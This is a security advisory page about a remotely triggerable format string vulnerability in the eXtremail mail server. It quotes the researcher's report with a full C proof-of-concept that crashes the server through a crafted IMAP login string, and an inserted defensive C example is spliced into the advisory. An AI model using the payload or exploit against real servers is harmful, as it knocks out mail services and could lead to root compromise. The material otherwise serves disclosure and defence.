SecurityTracker.com
Category:   Application (E-mail Server)  >   eXtremail
Vendors:   extremail.com
(Latest Version *Still* Vulnerable; Denial of Service Exploit is Available) eXtremail Mail Server Yields Root Level Privileges for Remote Users
SecurityTracker Alert ID:  1009952
SecurityTracker URL:  http://securitytracker.com/id/1009952
CVE Reference:   CVE-2001-1078
Date:  Apr 27 2004
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 1.5.9
Description:   A vulnerability has been discovered in the eXtremail mail server that allows remote users to obtain root level privileges on the server.

The format string problem is reportedly located in the flog() function, where user-supplied data is used as the format string for an fprintf() statement.

A remote user can send appropriately constructed strings as the arguments to the following commands to obtain root-level privileges on the server:

Smtpd - HELO / EHLO / MAIL FROM:<....@....> / RCPT TO:<....@....>
Pop3 - USER (+ others requiring a suitable login).

Luca Ercoli indicates that the IMAP service is also affected and has provided demonstration exploit code, available in the Source Message.
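
The flaw class described above, shown from the defensive side as an added example (this is not eXtremail's code): a logger that keeps the format string constant, plus a check that counts printf directives in untrusted protocol arguments. The names flog_safe and count_format_directives and the sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern from the advisory, shown only as a comment:
 *     fprintf(logfp, user_input);   // input is parsed as the format string
 * Hardened pattern (hypothetical helper): the format is a constant and the
 * untrusted text is passed strictly as a "%s" argument. */
int flog_safe(char *out, size_t outsz, const char *proto, const char *untrusted)
{
    return snprintf(out, outsz, "%s - Error: User %s", proto, untrusted);
}

/* Count printf conversion directives in untrusted input. "%%" is a literal
 * percent sign; flags, width, precision and length modifiers are skipped.
 * A non-zero count in a HELO/MAIL FROM/USER/login argument is worth an alert. */
int count_format_directives(const char *s)
{
    int n = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }
        s += strspn(s, "-+ #0123456789.*$hlLqjzt");
        if (*s != '\0' && strchr("diouxXeEfFgGaAcspn", *s) != NULL)
            n++;
    }
    return n;
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    const char *samples[] = { "alice", "100%% sure", "%s%s%n" };
    char line[256];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        flog_safe(line, sizeof line, "IMAP", samples[i]);
        printf("%-40s directives=%d\n", line,
               count_format_directives(samples[i]));
    }
    return 0;
}
```

With the constant format, the directives in the third sample reach the log as literal text instead of being interpreted.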

Impact:   A remote user can cause arbitrary commands to be executed by the mail server with root level privileges, giving root level access to the server.
Solution:   The vulnerability was reportedly fixed in version 1.1.10 but then re-introduced in more recent versions. Versions 1.5.5 and 1.5.8 were previously reported to be vulnerable. Luca Ercoli reports that 1.5.9 is also vulnerable.
Vendor URL:  www.extremail.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (AIX)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 22 2001 eXtremail Mail Server Yields Root Level Privileges for Remote Users



 Source Message Contents

Subject:  Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String




eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack, SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP, POP and IMAP commands.
The vulnerability has been reported to affect some previous versions
(BugTraq ID: 2908) and has been reintroduced in the latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted
to regain its functionality (Smtpd, Pop3d, Imapd, Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service	      *
*					      *
*  Luca Ercoli	<luca.e [at] seeweb.com>      *
*  Seeweb	   http://www.seeweb.com      *
*					      *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {	
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli	<luca.e [at] seeweb.com>
Seeweb		http://www.seeweb.com

 
 



Copyright 2019, SecurityGlobal.net LLC